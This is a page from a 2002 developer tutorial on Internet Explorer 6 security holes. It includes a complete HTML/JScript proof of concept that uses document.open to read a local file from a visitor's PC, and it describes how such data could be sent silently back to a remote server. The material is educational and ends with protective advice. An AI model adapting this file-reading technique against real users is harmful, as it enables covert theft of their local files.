Home arrow HTML arrow Page 4 - Internet Explorer 6 Hacks And Holes Exposed
HTML

Internet Explorer 6 Hacks And Holes Exposed


Apparently Microsoft were in a little bit of a rush to get Internet Explorer 6 out the door, and forgot to take that extra bit of time to debug and test it for security cracks and holes. In this article Mitchell talks about the latest security holes found in IE6. He shows you how to test your system for vulnerabilities and also provides links to the relevant patches and more information on the holes.

Author Info:
By: Mitchell Harper
Rating: 5 stars5 stars5 stars5 stars5 stars / 20
February 14, 2002
TABLE OF CONTENTS:
  1. · Internet Explorer 6 Hacks And Holes Exposed
  2. · Mmmmm... gimme cookie!
  3. · Site Impersonation: Mixed Identities
  4. · Direct file access
  5. · Conclusion

print this article
SEARCH DEVARTICLES

Internet Explorer 6 Hacks And Holes Exposed - Direct file access
(Page 4 of 5 )

One final example that I would like to show you today is how easy it is to grab the contents of a file from a users PC and send it back to a web server for processing and analysing.

The document.open function is used to open documents in a new window. When I say documents I'm roughly talking about HTML pages that reside on some remote server. With most browsers all you can open in a new window is remote documents, remote meaning those that need to be retrieved over a protocol, such as HTTP or FTP. Sure you can use the file:/// syntax to open a local file with most browsers, but you can't do this using client-side code from a remote web page right? or can you?

That's right, thanks to a couple more holes in IE6, it's now possible to see the contents of a file on a clients machine... all with one simple call to the document.open function. Create a new file named c:\file_read.html. Enter the following code into it:

<html>

<head>

<title> Local File Reading </title>

<script language="JavaScript">

<!--

function readFile()

{

// What file do we want to read?

fileLoc = 'c:/winnt/setuplog.txt';

file = document.open(fileLoc, "fileWin", "top=5000, left=5000, width=1, height=1");

contents = file.document.body.innerText;

file.close();

document.write("<b>I can see the contents of " + fileLoc + ": </b><br><br>");

document.write("<textarea style='width:400; height:300'>" + contents + "</textarea>");

}

-->

</script>

</head>

<body bgcolor="#FFFFFF" onLoad="readFile()">

</body>

</html>


The JScript code in the example above retrieves the contents of c:\winnt\setuplog.txt (which is the log from the installation of Windows 2000) and displays it in a text box on a web page. The location of the local file is specified in the fileLoc variable, and can be any file you like. The only criteria for this code to work are that the file must be either a HTML or text file, and must exist on the users PC.

If you're thinking that you can't do much with text files, then think about XML. XML is a based on text, and if quickly becoming the replacement for traditional INI files. If you knew where a user had an XML file residing on their hard drive, you could grab it and use IE6's built-in XML rendering engine (MSXML) to grab elements from the file. Furthermore, you could use JScript's object handling events to automatically submit that data back to a remote web server (form1.submit())... all while the client has no idea of what's going on. A definite security worry indeed!

Obviously the best way to protect yourself from this hole is to disable client-side scripting completely, raising your security settings to high if you feel the need to do so.
blog comments powered by Disqus
HTML ARTICLES

- Does HTML5 Need a Main Element?
- Revisiting the HTML5 vs. Native Debate
- HTML5: Not for Phone Apps?
- HTML5 or Native?
- Job Hunting? Freelancer.com Lists This Quart...
- HTML5 in the News
- Report: HTML5 Mobile Performance Lags
- The Top HTML5 Audio Players
- Top HTML5 Video Tutorials
- HTML5: Reasons to Learn and Use It
- More of the Top Tutorials for HTML5 Forms
- MobileAppWizard Releases HTML5 App Builder
- HTML5 Boilerplate: Working with jQuery and M...
- HTML5 Boilerplate Introduction
- New API Platform for HTML5

Watch our Tech Videos 
Dev Articles Forums 
 RSS  Articles
 RSS  Forums
 RSS  All Feeds
Write For Us 
Weekly Newsletter
 
Developer Updates  
Free Website Content 
Contact Us 
Site Map 
Privacy Policy 
Support 

Developer Shed Affiliates

 




© 2003-2017 by Developer Shed. All rights reserved. DS Cluster - Follow our Sitemap
Popular Web Development Topics
All Web Development Tutorials